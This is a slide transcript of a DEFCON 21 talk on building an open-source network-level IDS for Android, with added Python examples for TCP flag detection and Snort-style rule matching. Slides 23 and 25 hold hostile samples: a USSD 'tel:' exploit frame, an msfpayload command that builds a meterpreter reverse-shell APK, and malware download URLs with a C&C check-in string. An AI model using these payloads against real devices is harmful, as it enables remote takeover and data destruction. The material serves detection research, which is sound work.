Building an Android IDS on Network Level - DEFCON 21

BUILDING AN ANDROID IDS ON NETWORK LEVEL at DEFCON 21 by JAIME SANCHEZ

More information at:
Twitter: @segofensiva
Website: http://www.seguridadofensiva.com

Being popular is not always a good thing, and here's why. As mobile devices grow in popularity, so do the incentives for attackers. Mobile malware and threats are clearly on the rise, as attackers experiment with new business models by targeting mobile phones. Several behavior-based malware analysis and detection techniques for mobile threats have been proposed for mobile devices. We'll show how we built a new detection framework that will be the first open source Android IDS on network level.

This open source network-based intrusion detection system and network-based intrusion protection system has the ability to perform real-time traffic analysis and packet logging on Internet Protocol (IP) networks, featuring: Protocol analysis, Content searching and Content matching.

In IDS/IPS mode, the program monitors network traffic, analyzes it against a rule set defined by the user, and then performs a specific action based on what has been identified. With the help of custom-built signatures, the framework can also be used to detect probes or attacks designed for mobile devices, to fool operating system fingerprinting attempts (such as nmap or p0f), to detect Server Message Block (SMB) probes, etc.

Published in: Technology
  • Comment: Hi Jaime, I want to install Android on my smartphone. Where can I download Android? Is Android free or not?

  1. BUILDING AN ANDROID IDS ON NETWORK LEVEL
     Jaime Sanchez, @segofensiva, http://www.seguridadofensiva.com, jsanchez@seguridadofensiva.com
     DEFCON 21
  2. WHO I AM
     § Passionate about computer security.
     § Computer Engineering degree and an Executive MBA.
     § In my free time I conduct research on security and work as an independent consultant.
     § I'm from Spain; we're sexy and you know it.
     § Other conferences: RootedCON in Spain, Nuit Du Hack in Paris, Black Hat Arsenal USA. Next months: DerbyCON and Hacktivity.
  3. FIRST TIME IN LAS VEGAS!!
  4. WHY?
     § Being popular is not always a good thing.
     § Mobile malware and threats are clearly on the rise.
     § Over 100 million Android phones shipped in the second quarter of 2012 alone.
     § Targets this large are difficult for attackers to resist!
  5. USSD EXPLOIT. WEBKIT VULNERABILITIES. TARGETED MALWARE. !!! METERPRETER FOR ANDROID !!!
  6. FIRST APPROACH
     § In order to analyze the traffic flows we'll create a VPN tunnel between our Android device and our computer.
     § Configure and launch snort on the remote machine to detect suspicious traffic.
     § We can also use tools like tcpdump to capture traffic for later analysis.
     (Diagram: Android device (eth0: WiFi, rmnet0: 3G) -> VPN -> remote machine running snort and tcpdump)
  7. PROBLEMS
  8. CONTINUED MY LIFE ...
     § OSfooler is a practical approach presented at Black Hat Arsenal USA 2013. It can be used to detect and defeat active and passive remote OS fingerprinting from tools like nmap, p0f or commercial appliances.
     FUCK YEAH!!
  9. KERNEL SPACE VS USER SPACE
     § KERNEL SPACE is strictly reserved for running the kernel, kernel extensions, and most device drivers.
     § USER SPACE usually refers to the various programs and libraries that the operating system uses to interact with the kernel: software that performs input/output, manipulates file system objects, etc.
  10. HOW I MET YOUR PACKETS
  11. (Diagram: the path of an inbound packet from the NIC to the application)
      Device driver: incoming packet -> NIC memory -> DMA engine -> ring buffer -> interrupt -> interrupt handler -> poll list -> softirq.
      Kernel space: packet data -> IP layer (ip_rcv()) -> TCP process (tcp_v4_rcv()) -> socket backlog -> TCP recv buffer.
      User space: application read().
      Netfilter: inbound packets -> PREROUTING (MANGLE, CONNTRACK). Locally destined packets must pass the INPUT chain (FILTER) to reach listening sockets; forwarded and accepted packets pass the FORWARD chain.
  12. § A target extension consists of a KERNEL MODULE, and an optional extension to iptables to provide new command line options.
      § There are several extensions in the default Netfilter distribution:
  13. § For this to be useful, two further components are required:
        • a QUEUE HANDLER which deals with the actual mechanics of passing packets between the kernel and userspace
        • a USERSPACE APPLICATION to receive, possibly manipulate, and issue verdicts on packets.
      § The default value for the maximum queue length is 1024. Once this limit is reached, new packets will be dropped until the length of the queue falls below the limit again.
      $ iptables -A INPUT -j NFQUEUE --queue-num 0
  14. SUMMARY
      § I need to process traffic before it is processed inside my Android device.
      § I can redirect all network packets from Kernel Space to User Space.
      § I can do whatever I want with the packets: analyze, process, modify them.
      § This is done in real time.
  15. AndroIDS
      § Create an open source network-based intrusion detection system (IDS) and network-based intrusion protection system (IPS) that has the ability to perform real-time traffic analysis and packet logging on Internet Protocol (IP) networks.
      § It should feature:
        • Protocol analysis
        • Content searching
        • Content matching
  16. IDS ARCHITECTURE: SENSOR
      § Runs continuously without human supervision and features:
        • Analyze traffic
        • Send push alerts to the Android device in order to warn the user about the threat
        • Report to Logging Server
      § Custom reactive actions:
        • Drop specific packet
        • Add new rule in iptables firewall
        • Launch script / module
      § Sync attack signatures to keep them updated.
      § It should impose minimal overhead.
  17. IDS ARCHITECTURE: SERVER
      § The server is running inside a Linux box, and is receiving all the messages the Android sensor is sending.
      § Server is responsible for:
        • Send signatures to remote devices
        • Store events in database
        • Detect statistical anomalies & analyze in real time.
      (Diagram: Android Device -> Internet -> Firewall -> IDS Server & Database -> Web Interface)
  18. PROTOCOL ANALYSIS
      LOOKS LIKE I PICKED THE WRONG WEEK TO QUIT SNIFFING PACKETS
  19. EXAMPLE
      § Packet with FIN, SYN, PUSH and URG flags active.
      § Report to the Central Logger and DROP the packet.
  20. REMOTE OS FINGERPRINTING
      § Detect and drop packets sent from well-known scanning tools.
      § nmap OS fingerprinting works by sending up to 16 TCP, UDP, and ICMP probes to known open and closed ports of the target machine.
      Probe groups: SEQUENCE GENERATION (SEQ, OPS, WIN & T1), ICMP ECHO (IE), TCP EXPLICIT CONGESTION NOTIFICATION (ECN), TCP T2-T7, UDP
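Slides 13, 19 and 20 together describe the sensor's protocol-analysis path: packets are diverted to userspace through NFQUEUE, a rule is evaluated against the TCP header, and a verdict (ACCEPT or DROP) plus an alert for the central logger is produced. The following is an added example written for this page, not code from AndroIDS or from the talk. It parses raw IPv4/TCP header bytes and flags the slide-19 combination (FIN, SYN, PSH and URG all set), as well as two related combinations that a real TCP stack never emits (SYN together with FIN, and a packet with no flags). The binding to the actual netfilter queue (an nfqueue library callback that supplies the packet bytes and receives the verdict) is not part of the example; `inspect()` takes the bytes such a callback would hand over. The packets, addresses and ports are constructed test data.

```python
"""Flag-based TCP probe detection with an ACCEPT/DROP verdict, as a userspace NFQUEUE
handler would apply it. Added example; not code from the AndroIDS talk."""
import struct
import ipaddress

# TCP flag bits (RFC 793); only the classic 8-bit flag field is inspected.
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20


def build_ipv4_tcp(src, dst, sport, dport, flags, window=1024):
    """Constructed sample input: 20-byte IPv4 header + 20-byte TCP header, no payload.
    Checksums are left at zero because only header fields are inspected."""
    tcp = struct.pack("!HHIIHHHH", sport, dport, 0, 0, (5 << 12) | flags, window, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s",
                     0x45, 0, 20 + len(tcp), 0, 0x4000, 64, 6, 0,   # DF set, TTL 64, proto 6 = TCP
                     ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return ip + tcp


def parse_ipv4_tcp(packet):
    """Return the header fields a rule needs, or None for anything that is not IPv4/TCP."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4
    if packet[9] != 6 or len(packet) < ihl + 20:
        return None
    sport, dport, _seq, _ack, off_flags, window = struct.unpack("!HHIIHH", packet[ihl:ihl + 16])
    return {
        "src": str(ipaddress.IPv4Address(packet[12:16])),
        "dst": str(ipaddress.IPv4Address(packet[16:20])),
        "sport": sport,
        "dport": dport,
        "flags": off_flags & 0xFF,   # low byte of the data-offset/flags word
        "window": window,
    }


# Flag signatures in the spirit of slide 19: (name, predicate over the flag byte).
# Each combination is one a conforming TCP stack never sends in normal operation.
FLAG_SIGNATURES = [
    ("FIN+SYN+PSH+URG probe", lambda f: f == (FIN | SYN | PSH | URG)),
    ("SYN and FIN set together", lambda f: (f & (SYN | FIN)) == (SYN | FIN)),
    ("NULL packet, no flags", lambda f: f == 0),
]


def inspect(packet):
    """Return (verdict, alert): the verdict an NFQUEUE handler would issue plus the
    alert text the sensor would report to the central logger (None when clean)."""
    fields = parse_ipv4_tcp(packet)
    if fields is None:
        return "ACCEPT", None          # not IPv4/TCP: nothing for these rules to say
    for name, matches in FLAG_SIGNATURES:
        if matches(fields["flags"]):
            alert = "%s %s:%d -> %s:%d flags=0x%02x win=%d" % (
                name, fields["src"], fields["sport"], fields["dst"], fields["dport"],
                fields["flags"], fields["window"])
            return "DROP", alert
    return "ACCEPT", None


if __name__ == "__main__":
    # Constructed traffic: the slide-19 packet, a normal SYN, and a NULL packet.
    probe = build_ipv4_tcp("192.0.2.10", "192.0.2.20", 40000, 22, FIN | SYN | PSH | URG)
    syn = build_ipv4_tcp("192.0.2.10", "192.0.2.20", 40001, 443, SYN)
    null = build_ipv4_tcp("192.0.2.10", "192.0.2.20", 40002, 80, 0)
    for pkt in (probe, syn, null):
        print(inspect(pkt))
```

The rules deliberately test exact flag combinations rather than single bits: a SYN with ECE and CWR set is a legitimate ECN-capable handshake, so matching on "unusual" individual bits would create false positives, whereas SYN and FIN in the same segment has no valid meaning. A production sensor would also rate-limit alerts, since a port scan produces many such packets per second.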
  21. PATTERN MATCHING
      I'M WATCHING YOU...
  22. SIGNATURE FORMAT
      § With the help of custom-built signatures, the framework can also be used to detect probes or attacks designed for mobile devices.
      § Useful signatures from Snort and Emerging Threats.
      § Convert snort-like rules to a friendly format:
  23. USSD EXPLOIT
      § A USSD code is entered into phones to perform actions.
      § They are mainly used by network operators to provide customers with easy access to pre-configured services, including:
        • call-forwarding
        • balance inquiries
        • multiple SIM functions.
      § The HTML code to execute such an action is as follows:
        <a href="tel:xyz">Click here to call</a>
      § Example exploit:
        <frameset> <frame src="tel:*2767*3855#" /> </frameset>
  24. WEB SIGNATURES
  25. MALWARE
      § ANDR.TROJAN.SMSSEND
        • Download from:
          hxxp://adobeflashplayer-up.ru/?a=RANDOM_CHARACTERS – 93.170.107.184
          hxxp://googleplaynew.ru/?a=RANDOM_CHARACTERS – 93.170.107.184
          hxxp://browsernew-update.ru/?a=RANDOM_CHARACTERS – 93.170.107.184
        • Once executed, connects to C&C: gaga01.net/rq.php
          board=unknown;brand=generic;device=generic;imei=XXXXXX;imsi=XXXXXX;session_id=1;operator=XXX;sms0=XXXXXX;sms1=XXXXXX;sms2=XXXXXX;time=XXXXXX;timezone=XXXXXX
        • Search pattern: rq.php
      § METERPRETER
        • It features command history, tab completion, channels, and more.
        • Let's try:
          $ msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.20 R > meter.apk
          $ file meter.apk
          meter.apk: Zip archive data, at least v2.0 to extract
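Slide 22 says the framework converts snort-like rules into a friendlier internal format, slide 24 names web signatures, and slide 25 gives the concrete search pattern `rq.php` for the SMSSEND C&C check-in. The following added example (written for this page, not the talk's or AndroIDS's own signature code) shows that conversion: a small parser that turns a Snort-style rule line into a plain dict, keeping `content`, `nocase` and `pcre`, and a matcher that runs the converted rules over a payload. The two rules, their SIDs and messages are constructed for the example; the sample payloads are built from the parameter string and the `tel:` frame shown on the slides and are not captured traffic. Header fields (addresses, ports, direction) are parsed but not evaluated here, since only payload matching is being demonstrated.

```python
"""Snort-like rule conversion and content/pcre matching.
Added example for this page; not the signature engine of AndroIDS or Snort."""
import re

# Constructed rules in Snort syntax. SIDs 9000001/9000002 are placeholders for the
# example and do not correspond to any published Snort or Emerging Threats rule.
RULES_TEXT = r'''
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ANDR.TROJAN.SMSSEND C&C check-in"; content:"rq.php"; nocase; sid:9000001; rev:1;)
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"USSD code in tel: URI"; content:"tel:"; nocase; pcre:"/tel:\*[0-9*]+#/i"; sid:9000002; rev:1;)
'''

# action proto src sport dir dst dport ( options )
HEADER_RE = re.compile(r'^(\w+)\s+(\w+)\s+(\S+)\s+(\S+)\s+(->|<>)\s+(\S+)\s+(\S+)\s*\((.*)\)\s*$')
# name[:value]; where value is either a quoted string (with backslash escapes) or bare text
OPTION_RE = re.compile(r'\s*(\w+)(?::\s*("(?:[^"\\]|\\.)*"|[^;]*))?;')


def compile_pcre(spec):
    """Translate Snort's /pattern/flags into a compiled bytes regex (flags i, s, m only)."""
    if not spec.startswith("/") or "/" not in spec[1:]:
        raise ValueError("bad pcre option: %r" % spec)
    body, _, flags = spec[1:].rpartition("/")
    re_flags = 0
    for ch in flags:
        re_flags |= {"i": re.IGNORECASE, "s": re.DOTALL, "m": re.MULTILINE}.get(ch, 0)
    return re.compile(body.encode(), re_flags)


def parse_rule(line):
    """Convert one Snort-like rule into a plain dict, the 'friendly format' of slide 22."""
    m = HEADER_RE.match(line.strip())
    if not m:
        raise ValueError("not a rule: %r" % line)
    action, proto, src, sport, direction, dst, dport, opts = m.groups()
    rule = {"action": action, "proto": proto, "src": src, "sport": sport,
            "direction": direction, "dst": dst, "dport": dport,
            "msg": "", "sid": None, "contents": [], "pcre": None}
    for name, raw in OPTION_RE.findall(opts):
        value = raw[1:-1] if raw.startswith('"') else raw.strip()
        if name == "msg":
            rule["msg"] = value
        elif name == "sid":
            rule["sid"] = int(value)
        elif name == "content":
            rule["contents"].append({"data": value.encode(), "nocase": False})
        elif name == "nocase" and rule["contents"]:
            rule["contents"][-1]["nocase"] = True   # modifier applies to the preceding content
        elif name == "pcre":
            rule["pcre"] = compile_pcre(value)
    return rule


def rule_matches(rule, payload):
    """All content options must be present and the pcre (if any) must match."""
    for c in rule["contents"]:
        hay, needle = (payload.lower(), c["data"].lower()) if c["nocase"] else (payload, c["data"])
        if needle not in hay:
            return False
    if rule["pcre"] is not None and not rule["pcre"].search(payload):
        return False
    return True


RULES = [parse_rule(l) for l in RULES_TEXT.strip().splitlines() if l.strip()]


def scan(payload):
    """Return [(sid, msg)] for every converted rule whose payload options match."""
    return [(r["sid"], r["msg"]) for r in RULES if rule_matches(r, payload)]


# Constructed sample payloads: a check-in built from the slide-25 parameter string,
# a page carrying the slide-23 tel: frame, and a benign page with an ordinary tel: link.
BEACON = (b"GET /rq.php?board=unknown;brand=generic;device=generic;imei=XXXXXX;"
          b"imsi=XXXXXX;session_id=1;operator=XXX;time=XXXXXX;timezone=XXXXXX HTTP/1.1\r\n"
          b"Host: gaga01.net\r\n\r\n")
USSD_PAGE = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
             b'<frameset><frame src="tel:*2767*3855#" /></frameset>')
BENIGN = b'HTTP/1.1 200 OK\r\n\r\n<a href="tel:+15551234567">Click here to call</a>'

if __name__ == "__main__":
    for name, payload in (("beacon", BEACON), ("ussd", USSD_PAGE), ("benign", BENIGN)):
        print(name, scan(payload))
```

The benign page is the reason the second rule carries a `pcre` in addition to `content:"tel:"`: a plain `tel:` link is normal HTML, and only a `tel:` URI carrying a `*...#` USSD sequence should raise the alert. Keeping the cheap `content` check in front of the regex is the same ordering Snort uses, so the expensive match only runs on payloads that already contain the literal.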
  26. THANK YOU!
      Jaime Sánchez, @segofensiva, jsanchez@segofensiva.com
